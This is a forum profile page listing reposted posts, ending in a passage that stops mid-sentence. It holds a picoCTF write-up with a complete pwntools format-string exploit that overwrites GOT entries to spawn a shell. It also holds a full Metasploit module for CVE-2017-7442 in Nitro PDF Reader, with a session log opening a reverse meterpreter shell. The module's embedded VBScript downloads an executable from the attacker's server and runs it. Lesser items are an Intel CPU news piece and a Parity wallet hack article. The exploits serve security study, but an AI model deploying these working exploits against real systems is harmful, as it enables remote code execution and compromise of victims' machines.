Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    707

Everything posted by Nytro

  1. picoCTF Write-up ~ Bypassing ASLR via Format String Bug _py Apr 23 10 Hello folks! I hope you're all doing great. After a disgusting amount of trial and error, I present to you my solution for the console pwnable. Unfortunately, I did not solve the task on time but it was fun nevertheless. I decided to use this challenge as a way to introduce to you one of the ways you can bypass ASLR. If you have never messed with basic pwning i.e stack/buffer overflows, this write-up might not be your cup of tea. It'll be quite technical. Firstly I'll bombard you with theory and then we will move to the actual PoC/exploit, aka the all-time classic @_py way of explaining stuff. Let's dive right into, shall we? Code Auditing Though the source code was provided (you can find a link to at the bottom of the write-up), you could easily spot the bug just by reading the disassembly. Since some of you might not be experienced with Reverse Engineering, below are the important parts of code: [...] void set_exit_message(char *message) { if (!message) { printf("No message chosen\n"); exit(1); } printf("Exit message set!\n"); printf(message); append_command('e', message); exit(0); } void set_prompt(char *prompt) { if (!prompt) { printf("No prompt chosen\n"); exit(1); } if (strlen(prompt) > 10) { printf("Prompt too long\n"); exit(1); } printf("Login prompt set to: %10s\n", prompt); append_command('p', prompt); exit(0); } [...] void loop() { char buf[1024]; while (true) { printf("Config action: "); char *result = fgets(buf, 1024, stdin); if (!result) exit(1); char *type = strtok(result, " "); if (type == NULL) { continue; } char *arg = strtok(NULL, "\n"); switch (type[0]) { case 'l': set_login_message(arg); break; case 'e': set_exit_message(arg); break; case 'p': set_prompt(arg); break; default: printf("Command unrecognized.\n"); /* Fallthrough */ case 'h': print_help(); break; } } } [...] Here is the bug: void set_exit_message(char *message) { [...] printf("Exit message set!\n"); printf(message); append_command('e', message); exit(0); } Cute, we've got control over printf! For those who do not understand why this is a bug, let me give you a brief rundown. To be honest, there are a bunch of resources on how format string attacks work, but since I'm making the effort to explain the exploit, it'd feel incomplete not to explain the theory behind it. I hope you know the basics of the stack at least, otherwise the following will not make much sense. Printf & Stack Analysis +------------+ | | | ... | | 8th arg | +------------+ | 7th arg | +------------+ | ret addr | +------------+ | ... | | local vars | | ... | +------------+ Now you might be asking yourselves, "what's up with the 7th and 8th argument in the ascii art?". Well, we are dealing with a 64-bit ELF binary. Meaning, as far as the function calling convention is concerned, the ABI states the following(simplified): The first 6 integer or pointer arguments to a function are passed in registers. The first is placed in rdi, the second in rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument and onwards are passed on the stack. Interesting. Let's enter the h4x0r mode and brainstorm a little bit. By typing man 3 printf we get the following intel: #include <stdio.h> int printf(const char *format, ...); So printf receives "2" arguments: The string format i.e "%d %x %s". A variable number of arguments. Ok that sounds cool and all, but how can we exploit this? The key in exploit development and in hacking overall, is being able to see through the abstraction. Let me explain myself further. Let's assume we have the following code: [...] 1. int32_t num = 6; 2. printf("%d", num); [...] Here's the pseudo-assembly for it: 1. mov [rbp - offset], 0x6 2. mov rsi, [rbp - offset] 3. mov rdi, "%d" 4. call printf Our format specifier includes "%d". What this whispers into printf's ear is "yo printf, you are about to get called with one format specifier, %d to be precise. According to the ABI, expect the argument to be in rdi, ok?" Then, printf will read the content of rdi and print the number 6 to stdout. Do you see where this is going? No? Alright, one more example. [...] 1. int32_t num = 6; 2. printf("%d %d %d %d"); [...] 1. mov [rbp - offset], 0x6 2. ??? 3. call printf In case you didn't notice, I changed the format string and the number of arguments being passed to printf. "What will this whisper into printf's ear?" you ask. Well, "yo printf, you are about to get called with 4 format specifiers, 4 %d's to be precise. According to the ABI, expect the arguments to be in rdi, rsi and so on, ok?" Now what's going to happen in this case? Has anything practically changed? Ofcourse not! Printf is dumb, all it knows is the format specifier. It "trusts" us, the user/program about the content of rdi, rsi etc. As I've stated before, we had control over printf. Control over its format specifier argument to be exact. That's really powerful! Why? 179 The above clip is a demo of the vulnerable CTF task. If you read the source code real quick (shouldn't take more than 5 mins to understand what it does), you'd realize that set_exit_message essentially receives as an argument whatever we place next to 'e' (e stands for exit). Afterwards, it calls printf with that argument. So what gives? The format string we provided, instructed printf to print its 8 byte integer "arguments" as pointers (%p expects a pointer). The values printed are values that printf finds at the locations it would normally expect arguments. Because printf actually gets one real argument, namely the pointer to buf (passed in %rdi), it will expect the next 5 arguments within the remaining registers and everything else on the stack. That's the case with our binary as well! We managed to leak memory! And the best part? We actually read values "above" set_exit_message's stack frame! Take a good look at the printf output. Does 0x400aa6 ring a bell? Looks like a text segment address. That's the return address in set_exit_message's stack frame, aka a loop's instruction address! Moreover, did you notice the 0x7025207025207025 value? Since the architecture is little-endian, converting the hex values to characters, we get the following: 0x25 -> '%' 0x70 -> 'p' 0x20 -> ' ' Holy moly! We leaked main's stack frame! But more importantly, our own input! That's the so called read primitive, which basically means we get to read whatever value we want, either in registers, stack or even our own input. You'll see how crucial that is in the exploitation segment. Do you understand now what I mean by seeing through the abstraction? We managed to exploit a simple assumption that computer scientists took for granted. Phew, alrigthy, I hope I made sense folks. Let's slowly move on to the exploitation part. First of all, this is a pwnable task, which means we need to get a shell (root privs) in order to be able to read the flag text file. Hmm, how can we tackle the task knowing that we have a read primitive? Let's construct a plan: We managed to read values off of registers and the stack, aka read primitive. We can take advantage of that and read certain values that will be useful to us, such as libc's base address. If we manage to leak libc's address, we can calculate addresses of other "pwnable" functions such as execve or system, and get a shell. Note, I say "leak", because ASLR is activated. Thus, in every execution the libc will have a different base address. Otherwise, if ASLR was off, its address would be hardcoded and our life would be much easier. Libc's functions are a constant offset away from libc's base address so we won't have an issue leaking them once we get the base address. Alright, we can leak libc's functions, and then what? Let's pause our plan for a while. (Note: Though dynamic linking is not a prerequisite to understand the high level view of the exploit, knowing its internals will give you a much better insight of the nitty-gritty details of the exploitation process. I have made quite a detailed write-up on Dynamic Linking internals which can be found here). The Dark Side Of Printf We saw that we have an arbitrary read through the format string bug. But that's not enough. Wouldn't be awesome if we could somehow not only read values but also write? Enter the dark zone folks: %n specifier If you are not into pwning or programming in C you have probably never seen the "%n" specifier. %n is the gold mine for format string attacks. Using this stackoverflow link8 as a reference, I'll explain what %n is capable of. #include <stdio.h> int main() { int val; printf("blah %n blah\n", &val); printf("val = %d\n", val); return 0; } Output: blah blah val = 5 Simply put, it stores the amount of characters printed on the screen to a variable (providing its address). Sweet, now we have a write primitive as well! How can we take advantage of that? Since we have an arbitrary write, we can write anything we want to wherever we want (you'll see how shortly). Let's resume our plan: We can overwrite any address with a value that makes our life easier. We could overwrite a function's address with system's and game over! Nope, not that easily at least. Looking at the source, we can see that after printf is called, exit() is called. This is a bummer, since our plan does not only require an arbitrary write, but an arbitrary read as well. We can't just leak libc's base address AND overwrite a function through the same format string. We need to do it in separate steps. But how? Exit() will terminate the program. Unless, we overwrite exit's address with something else! Hmm, that's indeed a pretty neat idea. But with what? What about loop's address?! That sounds like an awesome plan! We can overwrite exit's address with loop's, leading to the binary never exiting! That way, we can endlessly enter our bogus input and read/write values with no rush. %[width] modifier Another dark wizardry of printf is the following code: [...] printf("Output:"); printf("%100x", 6); [...] Terminal: > ./demo Output: 6 6 is padded to a size of 100 bytes long. In other words, with the [modifier] part we can instruct printf to print whatever amount of bytes we want. Why is that useful though? Imagine having to write the value 0x1337 to a variable using the %n specifier (keep in mind that function addresses vary from 0x400000 all the way to 0x7fe5b94126a3. That trick will be really helpful to us.). Trying to actually type 0x1337 character by hands is tedious and a waste of time. The above modifier gets the job done easier. %[number]$ specifier The last trick we'll be using is the $[number] specifier which helps us refer to certain stack offsets and what not. Demo time: 62 Scroll up to the demo where I showed you the bug in action through the %p specifier. If you count the values that are printed, you will notice that 0x400aa6 is the 9th value. By entering %9$p as I showed above, we can refer to it directly. Imagine replacing 'p', with 'n'. What would have happened? In a different case, it would crash because 0x400aa6 would be overwritten with the amount of characters being printed (which would not be a valid instruction address). In our case, nothing should happen since exit() is called, which means we will never return back to loop(). Pwning Time I know this might look like a lot to take in, but without the basics and theory, we are handicapped. Bare in mind, it took me around 3-5 days of straight research in order to get this to work. If you feel like it's complicated, it's not. You just need to re-read it a couple of times and play with the binary yourself in order to get a feel of it. Be patient, code is coming soon. It will all make sense (hopefully). Our plan starts making sense. First step is to overwrite exit's address with loop's. Luckily for us, the binary does not have full ASLR on. Meaning, the text segment which includes the machine code, and the Global Offset Table (refer to my Dynamic Linking write-up, I warned you), which includes function pointers to libc (and more), will have a hardcoded address. Now that we learnt all about the dark side of printf, it's time to apply this knowledge onto the task. Overwriting exit In order to do that, we first need to place exit's GOT entry in the format string. The reason for that is that since we have an arbitrary read/write: We can place exit's address in the format string (which will be stored on the stack). Use with the %$[number] specifier to refer to its offset. Use the %[number] modifier to pad whatever is already printed to a certain number. Use the %n specifier to write that certain number to exit's address. Let's begin exploring with the terminal and soon we will move to python using pwntools4. By the way, not sure if you noticed it, but I decided to include more "live" footage this time than just screenshots. The concept can be confusing so I'll do my best to be as thorough as possible. Let the pwning begin: 56 At this point I'd like to thank @exploit who reminded me of the stack alignment because I was stuck trying to figure out why the A's were getting mixed up. Watch each demo carefully. If I feel there is a need to explain myself further I'll add comments below the asciinema instance. You are more than welcome to ask me questions in the comments. Anyway, as shown in the demo, we begin our testing by entering A's in our format string and then %p's in order to print them out. We found out that they are the 15th value. Let's try the %15$p trick this time. 27 Looking good so far. Let's automate it in python so we won't have to enter it every time. # demo.py from pwn import * p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "A"*8 payload += "|%15$p|".rjust(8) p.sendline(payload) p.recvline() p.interactive() Awesome, now we've got control over our input and we know its exact position. Let's try with exit's GOT entry this time, 0x601258. Remember, we are dealing with 8-byte chunks so we need to pad the address to 8-bytes long: # demo.py from pwn import * p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += p64(0x601258) # \x58\x12\x60\x00\x00\x00\x00\x00 payload += "|%15$p|".rjust(8) p.sendline(payload) p.recvline() p.interactive() Let's see what it does in action. 33 Hm, something is wrong here. Not only did we not get the address, but not even the "|...|" part. Why? Well, in case you didn't know, printf will stop at a null-byte. Which makes sense! Exit's GOT entry does have a null-byte. Meaning, printf will read up to '\x60' and then it will stop. How can we fix that? Easy, we just move our address after the format specifier. #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%16$p|".rjust(8) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() Now our script should work. I've changed exit's position in the string and updated '%15$p' to '%16$p'. I'll let you think about why I changed the specifier offset. After all this explanation it should be clear. Let's run our script, shall we? 32 Look at that, our address is there! Problem fixed. Unfortunately that's the bummer with 64-bit addresses but when it comes to 32-bit ones, we wouldn't have that issue. Either way, the fix was simple. Let's recap: We've managed to get control over our input. We placed exit's address in the string. In doing so, we managed to find its offset. Knowing its offset we can use %offset$n to write to that address. Thinking back to our plan, our goal is to overwrite exit's address with loop()'s. I know beforehand that exit's GOT entry points to 0x400736. That's because exit has not been called yet and thus it points to its PLT entry which has executable code to find exit's address in libc. So what we want is this: 0x400736 => 0x4009bd We don't have to overwrite the whole address as you can see. Only its 2 lower bytes. Now I will demonstrate how %n can be used. You will notice that demo will be kinda slow. That's because asciinema does not record 2 terminals at a time and I'll be using two. One to run the binary and one to use gdb and attach to it. Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%17$n|".rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() First I will show what's happening without the help of GDB and then I'll fire it up. 24 We get a segfault, which makes sense, right? We overwrote exit's address with the amount of characters being printed, which is too little and thus not a legal address to jump to. Let's see what GDB has to say about this. 33 As shown above, I attached to the running binary with GDB and pressed enter in my 2nd terminal to send the input. It's pretty clear that exit's address got overwritten. 0x400736 => 0x0000000d This is definitely not what we want as the result, but we are getting there! We can use our printf magic tricks and make it work. %[number] In order to increase the number of bytes being printed. %hn specifier I didn't mention it earlier, but it's time to introduce you to yet another dark side of printf. With %hn we can overwrite the address partially. %hn has the ability to overwrite only the 2 bytes of our variable, exit's address in our case. I said it earlier that we don't need to overwrite the whole address, only its lower 2 bytes since the higher 2 bytes are the same. I know, I know, confusing, but hey, that's why a demo is on its way! Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%17$hn|".rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 12 Bam! We went from 0x0000000d to 0x0040000c. Partial overwrite folks! Now let's think carefully. We want 0x09bd to be the 2 lower bytes. All we have to do is: Convert 0x09bd to decimal. Use that number in the form of %2493x. You will notice that the 2 lower bytes will be slightly off but we can adjust that as you'll see soon. Let's update our script: #demo.py from pwn import * EXIT_GOT = 0x601258 LOOP = 0x4009bd p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += ("%%%du|%%17$hn|" % 2493).rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 11 Looks like it worked! Well, almost. We just need to subtract 6 and we should be golden! Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 LOOP = 0x4009bd p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += ("%%%du|%%17$hn|" % 2487).rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 7 Boom! We successfully overwrote exit's address with loop's. So every time exit gets called, we will jump right back in the beginning and we will be able to enter a different format string, but this time to leak libc's base address and more. Leaking Libc Time to move on with our plan. Leaking libc is not that hard. With a little bit of code we can resolve its base address in no time. def leak(addr): info("Leaking libc base address") payload = "exit".ljust(8) payload += "|%17$s|".rjust(8) payload += "blablala" payload += p64(addr) p.sendline(payload) p.recvline() data = p.recvuntil("blablala") fgets = data.split('|')[1] fgets = hex(u64(fgets.ljust(8, "\x00"))) return fgets I will not explain every technical aspect of the snippet since this is not a Python tutorial. This is what I tried to achieve overall: The goal is to leak libc's base address. We can accomplish that by leaking a libc's function address. Fgets() in our case would be a wise choice since it's already been resolved. In particular, I entered fgets's GOT entry which contains the actual address. The %s specifier will treat the address we entered as a string of bytes. Meaning, it will try to read what's INthe GOT entry. The output will be a stream of raw bytes. I used the u64() function to convert the raw bytes to an actual address. Once we find its address, we subtract its libc offset from it and we get the base address. I made the exploit a little cleaner: #demo.py from pwn import * import sys HOST = 'shell2017.picoctf.com' PORT = '47232' LOOP = 0x4009bd STRLEN_GOT = 0x601210 EXIT_GOT = 0x601258 FGETS_GOT = 0x601230 FGETS_OFFSET = 0x6dad0 SYSTEM_OFFSET = 0x45390 STRLEN_OFFSET = 0x8ab70 def info(msg): log.info(msg) def leak(addr): info("Leaking libc base address") payload = "exit".ljust(8) payload += "|%17$s|".rjust(8) payload += "blablala" payload += p64(addr) p.sendline(payload) p.recvline() data = p.recvuntil("blablala") fgets = data.split('|')[1] fgets = hex(u64(fgets.ljust(8, "\x00"))) return fgets def overwrite(addr, pad): payload = "exit".ljust(8) payload += ("%%%du|%%17$hn|" % pad).rjust(16) payload += p64(addr) p.sendline(payload) p.recvline() return def exploit(p): info("Overwriting exit with loop") pad = (LOOP & 0xffff) - 6 overwrite(EXIT_GOT, pad) FGETS_LIBC = leak(FGETS_GOT) LIBC_BASE = hex(int(FGETS_LIBC, 16) - FGETS_OFFSET) SYSTEM_LIBC = hex(int(LIBC_BASE, 16) + SYSTEM_OFFSET) STRLEN_LIBC = hex(int(LIBC_BASE, 16) + STRLEN_OFFSET) info("system: %s" % SYSTEM_LIBC) info("strlen: %s" % STRLEN_LIBC) info("libc: %s" % LIBC_BASE) p.interactive() if __name__ == "__main__": log.info("For remote: %s HOST PORT" % sys.argv[0]) if len(sys.argv) > 1: p = remote(sys.argv[1], int(sys.argv[2])) exploit(p) else: p = process(['./console', 'log']) pause() exploit(p) Just some notes on how to find the libc the binary uses and how to find the function offsets: > ldd console [...] libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 [...] > readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep fgets [...] 753: 000000000006dad0 417 FUNC WEAK DEFAULT 13 fgets@@GLIBC_2.2.5 [...] Let's watch the magic happen: 27 As you can see, in every execution the libc's base changes, aka ASLR. But that does not affect us anymore since we overwrote exit with loop(). Jumping to system 2/3 of our plan is successfully done. All that is left is redirecting code execution to system with the argument being /bin/sh or sh ofcourse. In case you didn't notice, I purposely picked strlen as the victim. Why is that? Both system and strlen are invoked with one argument. Thus, once we overwrite strlen with system, system will read what is supposedly strlen's argument and execute that command. Looks like we have to go back to step #1 of our exploit. Meaning, we have to overwrite strlen's libc address with system's. Luckily for us, they share the same base address so practically we only have to overwrite the lower 4 bytes. For example, let's use one of our script's output. +-----------------------------+ | | 0x7fb4|21ec|0b70| (strlen) => 0x7fb4|21e7|b390| (system) | | +----------------------------+ This is how we can accomplish that: # subtract -7 at the end to get the correct offset WRITELO = int(hex(int(SYSTEM_LIBC, 16) & 0xffff), 16) - 7 WRITEHI = int(hex((int(SYSTEM_LIBC, 16) & 0xffff0000) >> 16), 16) - 7 # call prompt in order to resolve strlen's libc address. p.sendline("prompt asdf") p.recvline() info("Overwriting strlen with system") overwrite(STRLEN_GOT, WRITELO) overwrite(STRLEN_GOT+2, WRITEHI) The only part that deserves a bit of explanation is this one: overwrite(STRLEN_GOT, WRITELO) overwrite(STRLEN_GOT+2, WRITEHI) It seems like we overwrite the libc address via two short writes. It could be possible to do it with one but that would print a pretty big amount of padding bytes on the screen so with two writes is a bit cleaner. The concept is still the same. Let's visualize it as well: strlen GOT = 0x601210 Global Offset Table +--------------------+ | ... | +--------------------+ | ... | ... +--------------------+ | 0x21 | 0x601213 / +--------------------+ strlen + 0x2 | | 0xec | 0x601212 \ +--------------------+ | 0x0b | 0x601211 / +--------------------+ strlen + 0x0 | | 0x70 | 0x601210 \ +--------------------+ Now it should be more clear why and how we overwrite 2 bytes with each write. I'll show you each write separately with GDB and then the full exploit. Because I'll try to provide a view of both the exploit and GDB, the demos might be a bit slow because I'll be jumping around the terminals. Stay with me. overwrite(STRLEN_GOT, WRITELO) Exploit (skip a few seconds): 8 GDB: 8 You might noticed that at some point in the exploit I typed "prompt asdf". The reason I did that was to resolve strlen's address since it's the first time being called. I set a breakpoint in GDB at that point and stepped through the process. First time it went through the PLT stub code in order to resolve itself and once I typed c, its address was resolved and we overwrote its 2 lower bytes. Before: system: 0x7fea06160390 strlen: 0x7fea061a5b70 After: strlen: 0x7fea06160397 The 2 lower bytes are 7 bytes off which is why in the exploit you saw the -7 subtraction. Sometimes it ended up being 5 or 6 bytes off, but it doesn't matter. Just adjust the value to your needs. In your system it should be the same offset more or less. Let's execute the exploit with both writes this times. Exploit (skip a few seconds): 4 GDB: 10 Before: system: 0x7fe7a273a390 strlen: 0x7fe7a277fb70 After: strlen: 0x7fe7a273a390 Voila! We successfully overwrote strlen with system! Let's fire up the exploit without GDB and get shivers. PoC Demo 34 Conclusion That's been it folks. I hope I didn't waste your time. If you feel puzzled, don't get discouraged, just re-read it a couple of times and research the same topic on google. After reading plenty of examples and implementing one of your own, you'll be 1337. By the way, the task was a remote one, but the server was kinda slow when the CTF ended so I implemented it locally. The only change that you'd have to make is adjust the libc offsets, which is quite trivial since the libc was provided. Thank you for taking the time to read my write-up. Feedback is always welcome and much appreciated. If you have any questions, I'd love to help you out if I can. Finally, if you spot any errors in terms of code/syntax/grammar, please let me know. I'll be looking out for mistakes as well. You can find my exploit and the binary (source code, libc included) here22. Peace out,@_py Sursa: https://0x00sec.org/t/picoctf-write-up-bypassing-aslr-via-format-string-bug/1920
  2. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::FileDropper include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution', 'Description' => %q{ This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro PDF Reader version 11. The saveAs() Javascript API function allows for writing arbitrary files to the file system. Additionally, the launchURL() function allows an attacker to execute local files on the file system and bypass the security dialog Note: This is 100% reliable. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit 'sinn3r' # help with msf foo! ], 'References' => [ [ 'CVE', '2017-7442' ], [ 'URL', 'https://www.gonitro.com/' ], ], 'DefaultOptions' => { 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => [ # truly universal [ 'Automatic', { } ], ], 'DisclosureDate' => 'XXXX', 'DefaultTarget' => 0)) register_options([ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), ], self.class) end def build_vbs(url, stager_name) name_xmlhttp = rand_text_alpha(2) name_adodb = rand_text_alpha(2) vbs = %Q|<script language="VBScript"> Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP") #{name_xmlhttp}.open "GET","http://#{url}",False #{name_xmlhttp}.send Set #{name_adodb} = CreateObject("ADODB.Stream") #{name_adodb}.Open #{name_adodb}.Type=1 #{name_adodb}.Write #{name_xmlhttp}.responseBody #{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2 set shellobj = CreateObject("wscript.shell") shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0 </script>| vbs.gsub!(/ /,'') return vbs end def on_request_uri(cli, request) if request.uri =~ /\.exe/ print_status("Sending second stage payload") return if ((p=regenerate_payload(cli)) == nil) data = generate_payload_exe( {:code=>p.encoded} ) send_response(cli, data, {'Content-Type' => 'application/octet-stream'} ) return end end def exploit # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. @payload_name = rand_text_alpha(4) @temp_folder = "/Windows/Temp" register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta") if datastore['SRVHOST'] == '0.0.0.0' lhost = Rex::Socket.source_address('50.50.50.50') else lhost = datastore['SRVHOST'] end payload_src = lhost payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe" stager_name = rand_text_alpha(6) + ".vbs" pdf = %Q|%PDF-1.7 4 0 obj << /Length 0 >> stream | pdf << build_vbs(payload_src, stager_name) pdf << %Q| endstream endobj 5 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction [ 5 0 R /Fit ] /Names << /JavaScript << /Names [ (EmbeddedJS) << /S /JavaScript /JS ( this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta'); app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta'); ) >> ] >> >> >> endobj 2 0 obj <</Type/Pages/Count 1/Kids [ 5 0 R ]>> endobj 3 0 obj <<>> endobj xref 0 6 0000000000 65535 f 0000000166 00000 n 0000000244 00000 n 0000000305 00000 n 0000000009 00000 n 0000000058 00000 n trailer << /Size 6 /Root 1 0 R >> startxref 327 %%EOF| pdf.gsub!(/ /,'') file_create(pdf) super end end =begin saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc [*] Processing scripts/nitro.rc for ERB directives. resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (scripts/nitro.rc)> set LHOST 172.16.175.1 LHOST => 172.16.175.1 resource (scripts/nitro.rc)> exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 172.16.175.1:4444 msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.100.4:8080/ [*] Server started. [*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload [*] Sending stage (957487 bytes) to 172.16.175.232 [*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500 [+] Deleted C:/Windows/Temp/UOIr.hta msf exploit(nitro_reader_jsapi) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 2412 created. Channel 2 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\researcher\Desktop> =end Sursa: https://gist.github.com/stevenseeley/725c6c0be2ff76494c23db730fd30b6d
  3. Un procesor Intel Coffee Lake cu 6 nuclee a fost zărit by unacomn on 24/07/2017 Zvonurile despre procesoarele Intel din seria Coffee Lake continuă, de această dată și cu imagini. Sau mai bine zis, cu o imagine. Și-a făcut apariția pe internet o poză a unui procesor Coffee Lake, făcută în CPU-Z. Autenticitatea acestei imagini nu poate fi verificată în acest moment, așa că nu am cum să vă ofer vreo garanție că ar fi autentică. Se potrivește însă cu zvonurile de până acum. Această imagine ar fi de la un procesor i7 din seria Coffee Lake, luând în considerare faptul că are Hyperthreading. Denumirea procesorului nu este dată, fiind o mostră de testare. Ca standard, această variantă funcționează la 3.5GHz, cu o frecvență curentă de 3.9GHz, alături de un TDP de 80W. Chiar dacă imaginea este autentică, aceste caracteristici cu siguranță nu sunt finale, dar măcar ne dau o idee generală despre forma procesorului și cât de aproape este de lansare. Pentru ca un astfel de leak să aibă loc, în general procesoarele sunt la doar câteva luni de lansare. Faptul că au început deja să fie listate laptop-uri ce se folosesc de arhitectura Coffee Lake este încă un semn că Intel ar putea pregăti o lansare pentru toamna acestui an. Seria Coffee Lake iese în evidență prin ridicarea numărului de nuclee disponibile pe platforma dedicată publicului general la șase. Ar fi pentru prima dată când Intel face o astfel de schimbare în ultimul deceniu. [Videocardz] Sursa: https://zonait.tv/un-procesor-intel-coffee-lake-cu-6-nuclee-a-fost-zarit/ I se mai zice si "Procesoru' lu' @aelius"
      • 2
      • Like
      • Haha
  4. Da, misto. La noi nici macar "union select" nu mai e la moda.
  5. Haseeb Qureshi Software engineer. @Airbnb alum. Instructor @Outco. Writer. Effective Altruist. Blockchain believer. Former poker pro. Jul 20 A hacker stole $31M of Ether — how it happened, and what it means for Ethereum Yesterday, a hacker pulled off the second biggest heist in the history of digital currencies. Around 12:00 PST, an unknown attacker exploited a critical flaw in the Parity multi-signature wallet on the Ethereum network, draining three massive wallets of over $31,000,000 worth of Ether in a matter of minutes. Given a couple more hours, the hacker could’ve made off with over $105,000,000 from vulnerable wallets. But someone stopped them. Having sounded the alarm bells, a group of benevolent white-hat hackers from the Ethereum community rapidly organized. They analyzed the attack and realized that there was no way to reverse the thefts, yet many more wallets were vulnerable. Time was of the essence, so they saw only one available option: hack the remaining wallets before the attacker did. By exploiting the same vulnerability, the white-hats hacked all of the remaining at-risk wallets and drained their accounts, effectively preventing the attacker from reaching any of the remaining $77,000,000. Yes, you read that right. To prevent the hacker from robbing any more banks, the white-hats wrote software to rob all of the remaining banks in the world. Once the money was safely stolen, they began the process of returning the funds to their respective account holders. The people who had their money saved by this heroic feat are now in the process of retrieving their funds. It’s an extraordinary story, and it has significant implications for the world of cryptocurrencies. It’s important to understand that this exploit was not a vulnerability in Ethereum or in Parity itself. Rather, it was a vulnerability in the default smart contract code that the Parity client gives the user for deploying multi-signature wallets. This is all pretty complicated, so to make the details of this clear for everyone, this post is broken into three parts: What exactly happened? An explanation of Ethereum, smart contracts, and multi-signature wallets. How did they do it? A technical explanation of the attack (specifically for programmers). What now? The attack’s implications about the future and security of smart contracts. If you are familiar with Ethereum and the crypto world, you can skip to the second section. 1. What exactly happened? There are three building blocks to this story: Ethereum, smart contracts, and digital wallets. Ethereum is a digital currency invented in 2013 — a full 4 years after the release of Bitcoin. It has since grown to be the second largest digital currency in the world by market cap — $20 billion, compared to Bitcoin’s $40 billion. Like all cryptocurrencies, Ethereum is a descendant of the Bitcoin protocol, and improves on Bitcoin’s design. But don’t be fooled: though it is a digital currency like Bitcoin, Ethereum is much more powerful. While Bitcoin uses its blockchain to implement a ledger of monetary transactions, Ethereum uses its blockchain to record state transitions in a gigantic distributed computer. Ethereum’s corresponding digital currency, ether, is essentially a side effect of powering this massive computer. To put it another way, Ethereum is literally a computer that spans the entire world. Anyone who runs the Ethereum software on their computer is participating in the operations of this world-computer, the Ethereum Virtual Machine (EVM). Because the EVM was designed to be Turing-complete(ignoring gas limits), it can do almost anything that can be expressed in a computer program. Let me be emphatic: this is crazy stuff. The crypto world is ebullient about the potential of Ethereum, which has seen its value skyrocket in the last 6 months. The developer community has rallied behind it, and there’s a lot of excitement about what can be built on top of the EVM — and this brings us to smart contracts. Smart contracts are simply computer programs that run on the EVM. In many ways, they are like normal contracts, except they don’t need lawyers or judges to interpret them. Instead, they are compiled to bytecode and interpreted unambiguously by the EVM. With these programs, you can (among other things) programmatically transfer digital currency based solely on the rules of the contract code. Of course, there are things normal contracts do that smart contracts can’t — smart contracts can’t easily interact with things that aren’t on the blockchain. But smart contracts can also do things that normal contracts can’t, such as enforce a set of rules entirely through unbreakable cryptography. This leads us to the notion of wallets. In the world of digital currencies, wallets are how you store your assets. You gain access to your wallet using essentially a secret password, also known as your private key (simplified a bit). There are many different types of wallets that confer different security properties, such as withdrawal limits. One of the most popular types is the multi-signature wallet. In a multi-signature wallet, there are several private keys that can unlock the wallet, but just one key is not enough to unlock it. If your multi-signature wallet has 3 keys, for example, you can specify that at least 2 of the 3 keys must be provided to successfully unlock it. This means that if you, your father, and your mother are each signatories on this wallet, even if a criminal hacked your mother and stole her private key, they could still not access your funds. This leads to much stronger security guarantees, so multi-sigs are a standard in wallet security. This is the type of wallet the hacker attacked. So what went wrong? Did they break the private keys? Did they use a quantum computer, or some kind of cutting-edge factoring algorithm? Nope, all the cryptography was sound. The exploit was almost laughably simple: they found a programmer-introduced bug in the code that let them re-initialize the wallet, almost like 